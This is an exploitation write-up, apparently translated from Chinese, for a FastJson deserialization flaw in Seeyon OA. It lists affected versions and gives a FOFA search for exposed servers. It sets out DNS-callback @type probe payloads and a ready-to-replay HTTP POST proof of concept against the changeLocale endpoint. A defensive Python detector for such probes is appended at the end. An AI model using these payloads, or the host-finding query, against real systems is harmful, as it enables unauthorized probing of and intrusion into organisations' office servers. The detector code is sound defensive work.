致远 OA pseudo-0day: FastJson exploitation chain

0x01 Affected versions

V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1

0x02 Finding exposed instances

Search syntax

FOFA:"seeyon" && after="2021-05-01"

0x03 Vulnerability detection

JNDI applicability:
1. RMI vector: works on JDK versions before JDK 6u132, JDK 7u122 and JDK 8u113
2. LDAP vector: works on JDK versions before JDK 11.0.1, 8u191, 7u201 and 6u211

Telling FastJson apart from Jackson:
1) Leave a curly brace unclosed and read the error message
2) Parameter-count method
  {"name":"S", "age":21}           // FastJson raises no error
  {"name":"S", "age":21,"xxx":123} // Jackson is stricter and raises an error on the unknown field
3) FastJson error keyword:

com.alibaba.fastjson.JSONException, triggered by inputs such as:
 {"x":"
 ["x":1]
 {"x":{"@type":"java.lang.AutoCloseable"

DNS probe method:
Note: Content-Type: application/json

# PoC that raises no error
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}

# Raises an error, but still effective
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}

# Raises an error and returns 400, but still effective
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}

0x04 Reproduction

1. Verify the vulnerability with dnslog: open http://www.dnslog.cn to obtain a domain.

Vulnerability PoC

POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

_json_params={"@type":"java.net.Inet4Address","val":"qn94mq.dnslog.cn"}

2. Paste the request above into BurpSuite and set the matching Host and port.

A successful dnslog callback shows that the target is vulnerable.
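For the detection side, the following is an added example (not part of the original write-up) that flags FastJson autoType probes of the shapes listed above in both request styles this page uses: a raw application/json body and the form-encoded _json_params parameter. It deliberately matches on the raw string rather than parsing first, because most of the probes above are intentionally malformed JSON; the class list and the probe.example hostname are constructed for the example.

```python
import json
import re
from urllib.parse import parse_qs

# Classes named in the probe payloads on this page (constructed list, not exhaustive).
PROBE_CLASSES = (
    "java.net.InetSocketAddress", "java.net.Inet4Address", "java.net.Inet6Address",
    "java.net.URL", "java.lang.AutoCloseable", "com.alibaba.fastjson.JSONObject",
)
# An @type key followed by a colon; tolerates straight or typographic quotes and spaces.
AUTOTYPE_RE = re.compile('@type["\u201c\u201d]?\\s*:')

def json_candidates(content_type, body):
    """Strings the endpoint hands to the JSON parser: the raw body for JSON requests,
    every field value for form posts (the _json_params parameter on this page)."""
    if content_type.startswith("application/json"):
        return [body]
    if content_type.startswith("application/x-www-form-urlencoded"):
        fields = parse_qs(body, keep_blank_values=True)
        return [value for values in fields.values() for value in values]
    return [body]

def is_well_formed(text):
    try:
        json.loads(text)
        return True
    except ValueError:
        return False

def inspect_request(content_type, body):
    """One finding per candidate that carries an @type key. String-based on purpose:
    most probes above are malformed JSON, so parse-then-inspect would drop them."""
    findings = []
    for cand in json_candidates(content_type, body):
        if not AUTOTYPE_RE.search(cand):
            continue
        findings.append({
            "classes": sorted(c for c in PROBE_CLASSES if c in cand),
            "malformed": not is_well_formed(cand),
        })
    return findings

if __name__ == "__main__":
    # Constructed sample requests mirroring the probe shapes discussed on this page.
    samples = [
        ("application/x-www-form-urlencoded",
         '_json_params={"@type":"java.net.Inet4Address","val":"probe.example"}'),
        ("application/json", '{"x":Set[{"@type":"java.net.URL","val":"http://probe.example"}]}'),
    ]
    for ctype, body in samples:
        print(ctype, inspect_request(ctype, body))
```

The "malformed" flag is useful as a second signal: a legitimate client almost never sends JSON that fails to parse, while several of the probes above only work because FastJson resolves @type before it rejects the rest of the document.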